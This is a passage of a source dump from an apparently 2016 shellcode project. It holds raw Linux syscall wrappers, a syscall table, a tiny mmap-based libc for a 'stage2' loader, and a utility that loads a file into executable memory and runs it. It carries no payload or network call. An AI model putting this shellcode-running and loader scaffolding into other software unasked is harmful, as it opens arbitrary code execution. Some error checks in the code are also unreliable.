\"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\n\nssize_t _write(int fd, const void *buf, size_t size)\n{\n ssize_t ret;\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_write), \"D\"(fd), \"S\"(buf), \"d\"(size)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\nint _open(char *path, int mode, int flags)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_open), \"D\"(path), \"S\"(mode), \"d\"(flags)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\nint _close(int fd)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_close), \"D\"(fd)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\nlong _lseek(int fd, long offset, int whence)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_lseek), \"D\"(fd), \"S\"(offset), \"d\"(whence)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\nvoid * _mmap(void * start, long length, int prot, int flags, int fd, long offset)\n{\n register int r10 asm(\"r10\") = flags;\n register int r8 asm(\"r8\") = fd;\n register int r9 asm(\"r9\") = offset;\n void * ret = 0;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_mmap), \"D\"(start), \"S\"(length), \"d\"(prot), \"r\"(r10), \"r\"(r8), \"r\"(r9)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n\n return ret;\n}\n\nlong _mprotect(void * addr, long len, int prot)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_mprotect), \"D\"(addr), \"S\"(len), \"d\"(prot)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\nlong _munmap(char * start, int length)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_munmap), \"D\"(start), \"S\"(length)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n\nlong _brk(unsigned long addr)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_brk), \"D\"(addr)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n\n return ret;\n}\n\nint _exit(int level)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_exit), \"D\"(level)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return (ret);\n}\n\nlong _execve(char * filename, char ** argv, char ** envp)\n{\n long ret;\n\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_execve), \"D\"(filename), \"S\"(argv), \"d\"(envp)\n : \"cc\", \"rcx\", \"r11\", \"memory\"\n );\n return ret;\n}\n" }, { "path": "stage2/syscall_x86_64.h", "content": "#ifndef _ASM_X86_UNISTD_64_H\n#define _ASM_X86_UNISTD_64_H 1\n\n#define __NR_read 0\n#define __NR_write 1\n#define __NR_open 2\n#define __NR_close 3\n#define __NR_stat 4\n#define __NR_fstat 5\n#define __NR_lstat 6\n#define __NR_poll 7\n#define __NR_lseek 8\n#define __NR_mmap 9\n#define __NR_mprotect 10\n#define __NR_munmap 11\n#define __NR_brk 12\n#define __NR_rt_sigaction 13\n#define __NR_rt_sigprocmask 14\n#define __NR_rt_sigreturn 15\n#define __NR_ioctl 16\n#define __NR_pread64 17\n#define __NR_pwrite64 18\n#define __NR_readv 19\n#define __NR_writev 20\n#define __NR_access 21\n#define __NR_pipe 22\n#define __NR_select 23\n#define __NR_sched_yield 24\n#define __NR_mremap 25\n#define __NR_msync 26\n#define __NR_mincore 27\n#define __NR_madvise 28\n#define __NR_shmget 29\n#define __NR_shmat 30\n#define __NR_shmctl 31\n#define __NR_dup 32\n#define __NR_dup2 33\n#define __NR_pause 34\n#define __NR_nanosleep 35\n#define __NR_getitimer 36\n#define __NR_alarm 37\n#define __NR_setitimer 38\n#define __NR_getpid 39\n#define __NR_sendfile 40\n#define __NR_socket 41\n#define __NR_connect 42\n#define __NR_accept 43\n#define __NR_sendto 44\n#define __NR_recvfrom 45\n#define __NR_sendmsg 46\n#define __NR_recvmsg 47\n#define __NR_shutdown 48\n#define __NR_bind 49\n#define __NR_listen 50\n#define __NR_getsockname 51\n#define __NR_getpeername 52\n#define __NR_socketpair 53\n#define __NR_setsockopt 54\n#define __NR_getsockopt 55\n#define __NR_clone 56\n#define __NR_fork 57\n#define __NR_vfork 58\n#define __NR_execve 59\n#define __NR_exit 60\n#define __NR_wait4 61\n#define __NR_kill 62\n#define __NR_uname 63\n#define __NR_semget 64\n#define __NR_semop 65\n#define __NR_semctl 66\n#define __NR_shmdt 67\n#define __NR_msgget 68\n#define __NR_msgsnd 69\n#define __NR_msgrcv 70\n#define __NR_msgctl 71\n#define __NR_fcntl 72\n#define __NR_flock 73\n#define __NR_fsync 74\n#define __NR_fdatasync 75\n#define __NR_truncate 76\n#define __NR_ftruncate 77\n#define __NR_getdents 78\n#define __NR_getcwd 79\n#define __NR_chdir 80\n#define __NR_fchdir 81\n#define __NR_rename 82\n#define __NR_mkdir 83\n#define __NR_rmdir 84\n#define __NR_creat 85\n#define __NR_link 86\n#define __NR_unlink 87\n#define __NR_symlink 88\n#define __NR_readlink 89\n#define __NR_chmod 90\n#define __NR_fchmod 91\n#define __NR_chown 92\n#define __NR_fchown 93\n#define __NR_lchown 94\n#define __NR_umask 95\n#define __NR_gettimeofday 96\n#define __NR_getrlimit 97\n#define __NR_getrusage 98\n#define __NR_sysinfo 99\n#define __NR_times 100\n#define __NR_ptrace 101\n#define __NR_getuid 102\n#define __NR_syslog 103\n#define __NR_getgid 104\n#define __NR_setuid 105\n#define __NR_setgid 106\n#define __NR_geteuid 107\n#define __NR_getegid 108\n#define __NR_setpgid 109\n#define __NR_getppid 110\n#define __NR_getpgrp 111\n#define __NR_setsid 112\n#define __NR_setreuid 113\n#define __NR_setregid 114\n#define __NR_getgroups 115\n#define __NR_setgroups 116\n#define __NR_setresuid 117\n#define __NR_getresuid 118\n#define __NR_setresgid 119\n#define __NR_getresgid 120\n#define __NR_getpgid 121\n#define __NR_setfsuid 122\n#define __NR_setfsgid 123\n#define __NR_getsid 124\n#define __NR_capget 125\n#define __NR_capset 126\n#define __NR_rt_sigpending 127\n#define __NR_rt_sigtimedwait 128\n#define __NR_rt_sigqueueinfo 129\n#define __NR_rt_sigsuspend 130\n#define __NR_sigaltstack 131\n#define __NR_utime 132\n#define __NR_mknod 133\n#define __NR_uselib 134\n#define __NR_personality 135\n#define __NR_ustat 136\n#define __NR_statfs 137\n#define __NR_fstatfs 138\n#define __NR_sysfs 139\n#define __NR_getpriority 140\n#define __NR_setpriority 141\n#define __NR_sched_setparam 142\n#define __NR_sched_getparam 143\n#define __NR_sched_setscheduler 144\n#define __NR_sched_getscheduler 145\n#define __NR_sched_get_priority_max 146\n#define __NR_sched_get_priority_min 147\n#define __NR_sched_rr_get_interval 148\n#define __NR_mlock 149\n#define __NR_munlock 150\n#define __NR_mlockall 151\n#define __NR_munlockall 152\n#define __NR_vhangup 153\n#define __NR_modify_ldt 154\n#define __NR_pivot_root 155\n#define __NR__sysctl 156\n#define __NR_prctl 157\n#define __NR_arch_prctl 158\n#define __NR_adjtimex 159\n#define __NR_setrlimit 160\n#define __NR_chroot 161\n#define __NR_sync 162\n#define __NR_acct 163\n#define __NR_settimeofday 164\n#define __NR_mount 165\n#define __NR_umount2 166\n#define __NR_swapon 167\n#define __NR_swapoff 168\n#define __NR_reboot 169\n#define __NR_sethostname 170\n#define __NR_setdomainname 171\n#define __NR_iopl 172\n#define __NR_ioperm 173\n#define __NR_create_module 174\n#define __NR_init_module 175\n#define __NR_delete_module 176\n#define __NR_get_kernel_syms 177\n#define __NR_query_module 178\n#define __NR_quotactl 179\n#define __NR_nfsservctl 180\n#define __NR_getpmsg 181\n#define __NR_putpmsg 182\n#define __NR_afs_syscall 183\n#define __NR_tuxcall 184\n#define __NR_security 185\n#define __NR_gettid 186\n#define __NR_readahead 187\n#define __NR_setxattr 188\n#define __NR_lsetxattr 189\n#define __NR_fsetxattr 190\n#define __NR_getxattr 191\n#define __NR_lgetxattr 192\n#define __NR_fgetxattr 193\n#define __NR_listxattr 194\n#define __NR_llistxattr 195\n#define __NR_flistxattr 196\n#define __NR_removexattr 197\n#define __NR_lremovexattr 198\n#define __NR_fremovexattr 199\n#define __NR_tkill 200\n#define __NR_time 201\n#define __NR_futex 202\n#define __NR_sched_setaffinity 203\n#define __NR_sched_getaffinity 204\n#define __NR_set_thread_area 205\n#define __NR_io_setup 206\n#define __NR_io_destroy 207\n#define __NR_io_getevents 208\n#define __NR_io_submit 209\n#define __NR_io_cancel 210\n#define __NR_get_thread_area 211\n#define __NR_lookup_dcookie 212\n#define __NR_epoll_create 213\n#define __NR_epoll_ctl_old 214\n#define __NR_epoll_wait_old 215\n#define __NR_remap_file_pages 216\n#define __NR_getdents64 217\n#define __NR_set_tid_address 218\n#define __NR_restart_syscall 219\n#define __NR_semtimedop 220\n#define __NR_fadvise64 221\n#define __NR_timer_create 222\n#define __NR_timer_settime 223\n#define __NR_timer_gettime 224\n#define __NR_timer_getoverrun 225\n#define __NR_timer_delete 226\n#define __NR_clock_settime 227\n#define __NR_clock_gettime 228\n#define __NR_clock_getres 229\n#define __NR_clock_nanosleep 230\n#define __NR_exit_group 231\n#define __NR_epoll_wait 232\n#define __NR_epoll_ctl 233\n#define __NR_tgkill 234\n#define __NR_utimes 235\n#define __NR_vserver 236\n#define __NR_mbind 237\n#define __NR_set_mempolicy 238\n#define __NR_get_mempolicy 239\n#define __NR_mq_open 240\n#define __NR_mq_unlink 241\n#define __NR_mq_timedsend 242\n#define __NR_mq_timedreceive 243\n#define __NR_mq_notify 244\n#define __NR_mq_getsetattr 245\n#define __NR_kexec_load 246\n#define __NR_waitid 247\n#define __NR_add_key 248\n#define __NR_request_key 249\n#define __NR_keyctl 250\n#define __NR_ioprio_set 251\n#define __NR_ioprio_get 252\n#define __NR_inotify_init 253\n#define __NR_inotify_add_watch 254\n#define __NR_inotify_rm_watch 255\n#define __NR_migrate_pages 256\n#define __NR_openat 257\n#define __NR_mkdirat 258\n#define __NR_mknodat 259\n#define __NR_fchownat 260\n#define __NR_futimesat 261\n#define __NR_newfstatat 262\n#define __NR_unlinkat 263\n#define __NR_renameat 264\n#define __NR_linkat 265\n#define __NR_symlinkat 266\n#define __NR_readlinkat 267\n#define __NR_fchmodat 268\n#define __NR_faccessat 269\n#define __NR_pselect6 270\n#define __NR_ppoll 271\n#define __NR_unshare 272\n#define __NR_set_robust_list 273\n#define __NR_get_robust_list 274\n#define __NR_splice 275\n#define __NR_tee 276\n#define __NR_sync_file_range 277\n#define __NR_vmsplice 278\n#define __NR_move_pages 279\n#define __NR_utimensat 280\n#define __NR_epoll_pwait 281\n#define __NR_signalfd 282\n#define __NR_timerfd_create 283\n#define __NR_eventfd 284\n#define __NR_fallocate 285\n#define __NR_timerfd_settime 286\n#define __NR_timerfd_gettime 287\n#define __NR_accept4 288\n#define __NR_signalfd4 289\n#define __NR_eventfd2 290\n#define __NR_epoll_create1 291\n#define __NR_dup3 292\n#define __NR_pipe2 293\n#define __NR_inotify_init1 294\n#define __NR_preadv 295\n#define __NR_pwritev 296\n#define __NR_rt_tgsigqueueinfo 297\n#define __NR_perf_event_open 298\n#define __NR_recvmmsg 299\n#define __NR_fanotify_init 300\n#define __NR_fanotify_mark 301\n#define __NR_prlimit64 302\n#define __NR_name_to_handle_at 303\n#define __NR_open_by_handle_at 304\n#define __NR_clock_adjtime 305\n#define __NR_syncfs 306\n#define __NR_sendmmsg 307\n#define __NR_setns 308\n#define __NR_getcpu 309\n#define __NR_process_vm_readv 310\n#define __NR_process_vm_writev 311\n#define __NR_kcmp 312\n#define __NR_finit_module 313\n#define __NR_sched_setattr 314\n#define __NR_sched_getattr 315\n#define __NR_renameat2 316\n#define __NR_memfd_create 319\n\n#endif /* _ASM_X86_UNISTD_64_H */\n" }, { "path": "stage2/utils.c", "content": "#include \"utils.h\"\n\nvoid memset(void * dst, unsigned char c, unsigned int len)\n{\n unsigned char * p = (unsigned char *) dst;\n\n while(len--)\n *p++ = c;\n}\n\nint memcmp(void * dst, void * src, unsigned int len)\n{\n unsigned char * d = (unsigned char *) dst;\n unsigned char * s = (unsigned char *) src;\n\n while(len-- > 0)\n if(*d++ != *s++)\n return 1;\n\n return 0;\n}\n\nvoid memcpy(void *dst, void *src, unsigned int len)\n{\n unsigned char * d = (unsigned char *) dst;\n unsigned char * s = (unsigned char *) src;\n\n while(len--)\n *d++ = *s++;\n}\n\nint strlen(unsigned char *str)\n{\n int n = 0;\n\n while(*str++)\n n++;\n\n return n;\n}\n\nvoid printf(char *str, ...)\n{\n int len;\n va_list vl;\n char buf[4096];\n\n va_start (vl, str);\n len = vsnprintf (buf, sizeof (buf), str, vl);\n va_end (vl);\n buf[sizeof (buf) - 1] = '\\0';\n\n _write(1, buf, len);\n\n return;\n}\n\n\n// MBH malloc\n// use mmap for every required block\n// block header = [unsigned long user_size] [unsigned long allocd_size]\n#define MBM_PAGE_SIZE 0x1000\n#define MBM_SIZE_USER(ptr) (*(unsigned long *) ((unsigned long)(ptr) - 2 * sizeof(unsigned long)))\n#define MBM_SIZE_ALLOC(ptr) (*(unsigned long *) ((unsigned long)(ptr) - 1 * sizeof(unsigned long)))\n#define MBM_SIZE_HDR (2 * sizeof(unsigned long))\n\nvoid * realloc(void * addr, size_t size)\n{\n size_t alloc_size;\n unsigned long mem;\n\n if(!size)\n return NULL;\n\n if(addr && size < 0x1000 - MBM_SIZE_HDR)\n {\n MBM_SIZE_USER(addr) = size;\n return addr;\n }\n\n alloc_size = size + MBM_SIZE_HDR;\n if(alloc_size % MBM_PAGE_SIZE)\n alloc_size = ((alloc_size / MBM_PAGE_SIZE) + 1) * MBM_PAGE_SIZE;\n\n mem = _mmap(NULL, alloc_size, PROT_READ|PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\n if(mem < 0)\n {\n printf(\"> memory allocation error (0x%x bytes)\\n\", alloc_size);\n return NULL;\n }\n\n mem += MBM_SIZE_HDR;\n MBM_SIZE_USER(mem) = size;\n MBM_SIZE_ALLOC(mem) = alloc_size;\n\n if(addr && MBM_SIZE_USER(addr))\n memcpy((void*)mem, addr, MBM_SIZE_USER(addr));\n if(addr)\n free(addr);\n\n return (void*)mem;\n}\n\nvoid * malloc(size_t len)\n{\n return realloc(NULL, len);\n}\n\nvoid free(void * ptr)\n{\n char * page = (char *)(ptr) - MBM_SIZE_HDR;\n\n if(!ptr)\n return;\n\n _munmap(page, MBM_SIZE_ALLOC(ptr));\n}\n\n\n" }, { "path": "stage2/utils.h", "content": "#ifndef _SYMB_UTILS_H\n#define _SYMB_UTILS_H\n\n#include \"linuxdefs.h\"\n#include \n\nvoid memset(void * dst, unsigned char c, unsigned int len);\nint memcmp(void * dst, void * src, unsigned int len);\nvoid memcpy(void *dst, void *src, unsigned int len);\nint strlen(unsigned char *str);\nvoid printf(char *str, ...);\n\n// mem alloc\nvoid * realloc(void * addr, size_t size);\nvoid * malloc(size_t len);\nvoid free(void * ptr);\n\n// avoid int truncation issue\nvoid * _mmap(void * start, long length, int prot, int flags, int fd, long offset);\n\n#endif\n" }, { "path": "tools/README", "content": "2016 - ixty\n\nShellcode testing utility\n\nCompiled version distributed for each supported arch\nUse this utility to verify that the output functions correctly\n\nuser@x86_64-box $ ./sc_86 ./output\nuser@x86_64-box $ ./sc_x86_64 ./output\nuser@armhf-chroot $ ./sc_arm ./output\nuser@arm64-chroot $ ./sc_arm_64 ./output\n\n" }, { "path": "tools/sc.c", "content": "// 2016 - ixty\n// shellcode testing utility\n// compile with:\n// $ gcc -o sc sc.c\n\n#include \n#include \n#include \n\nint main(int ac, char ** av)\n{\n FILE * f;\n size_t l, ml;\n\n if(ac < 2 || !(f = fopen(av[1], \"rb\")))\n {\n printf(\"> usage %s \\n\", av[0]);\n return 1;\n }\n fseek(f, 0, SEEK_END);\n l = ftell(f);\n fseek(f, 0, SEEK_SET);\n\n ml = 0x1000;\n while(ml < l)\n ml += 0x1000;\n\n\tchar * mem = (char*)mmap(NULL, ml, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if(!mem)\n return 1;\n\n fread(mem, l, 1, f);\n fclose(f);\n mprotect(mem, ml, PROT_READ | PROT_WRITE | PROT_EXEC);\n\n printf(\"> sc len 0x%x allocated 0x%x bytes @ 0x%x\\n\", l, ml, mem);\n\t(*(void(*)()) mem)();\n\n\treturn 0;\n}\n\n" } ]